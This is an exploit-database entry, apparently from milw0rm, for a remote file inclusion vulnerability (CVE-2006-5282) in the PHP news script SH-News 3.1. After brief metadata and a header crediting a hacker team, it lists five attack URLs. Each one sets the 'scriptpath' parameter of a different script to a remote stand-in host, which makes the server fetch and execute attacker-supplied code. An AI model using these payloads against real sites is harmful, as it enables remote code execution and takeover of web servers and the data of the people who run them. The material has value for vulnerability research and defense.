SH-News 3.1 - 'scriptpath' Remote File Inclusion

Author: v1per-haCker
type: webapps
platform: php
port: 
date_added: 2006-10-10 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-29678;CVE-2006-5282;OSVDB-29677;OSVDB-29676;OSVDB-29675;OSVDB-29674 
tags: 
aliases:  
screenshot_url:  
application_url: 

#==================================================================
#  SH-News (RFI)
#==================================================================
# Info:-
#
# Scripts:  SH-News
# Download: http://www.hotscripts.com/jump.php?listing_id=19561&jump_type=1
# Version : 3.1
# Dork & vuln : download scripts and think :)
# Note : The vuln not tested on other version :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/report.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/archive.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/comments.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/init.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/news.php?scriptpath=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hitler_jeddah ; BooB11 ; FaTaL ;
#               ThE-WoLf-KsA ; mohandko ; fooooz ; maVen ; fucker_net ;
#	    metoovet
#and all members in XP10_hackEr Team
#thanx to str0ke :)
#WWW.XP10.COM
===================================================================

# milw0rm.com [2006-10-11]